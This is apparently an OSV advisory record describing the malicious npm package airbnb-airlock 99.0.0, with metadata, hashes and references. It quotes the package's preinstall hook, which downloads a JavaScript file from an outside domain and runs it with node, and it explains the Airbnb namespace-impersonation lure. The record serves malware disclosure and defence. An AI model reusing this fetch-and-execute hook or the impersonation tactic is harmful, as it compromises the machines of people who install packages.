{"id":"MAL-2026-6293","summary":"Malicious code in airbnb-airlock (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (034fd98a2ccd98f2bec2201d130c5a102ad17907c37af34b5162592e26a0fd43)\nThe package's preinstall lifecycle hook in package.json runs `curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js`, fetching an unpinned JavaScript file from poc.amanrawat.com and immediately executing it with node during `npm install`. The fetched content is mutable and entirely controlled by the operator of that domain — installers run whatever bytes are served at install time, with no hash or signature verification. The package ships no other functional content; the remote fetch-and-execute is its only behavior. The package name uses the 'airbnb-' prefix to impersonate the Airbnb open-source namespace while being published by an unrelated author with a placeholder description ('Test') and an inflated version (99.0.0), consistent with namespace impersonation intended to lure installers searching for Airbnb tooling.\n","modified":"2026-06-23T14:31:21.093109907Z","published":"2026-06-23T14:11:48Z","database_specific":{"malicious-packages-origins":[{"sha256":"034fd98a2ccd98f2bec2201d130c5a102ad17907c37af34b5162592e26a0fd43","source":"amazon-inspector","modified_time":"2026-06-23T14:11:48Z","versions":["99.0.0"],"id":"IN-MAL-2026-007205","import_time":"2026-06-23T14:23:03.286857051Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/airbnb-airlock/v/99.0.0"}],"affected":[{"package":{"name":"airbnb-airlock","ecosystem":"npm","purl":"pkg:npm/airbnb-airlock"},"versions":["99.0.0"],"database_specific":{"indicators":{"evidence_files":[{"sha256":"be1334c8fea52b8780ac6d2e4c9db381366d62eeab8190fbaf53ddc21788eae7","tlsh":"76e026348920107719c402d28c3aa40bd6c24e3b0104380d939b042cd0de93798fe31e","path":"package.json"}],"package_integrity":[{"hashes":{"sha1":"f5300e734c06a9de2a18a7b544cc33a212f87f96","sha512_sri":"sha512-YrHSLJsTMwrg7t1Cyq32Si11kk9JcE5yTcoPiAPRs+DS/Dg8tFhOCu7ytOrhfptGgu6xbtujJHmp/c9llNGaTw=="},"filename":"airbnb-airlock-99.0.0.tgz"}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/airbnb-airlock/MAL-2026-6293.json","cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}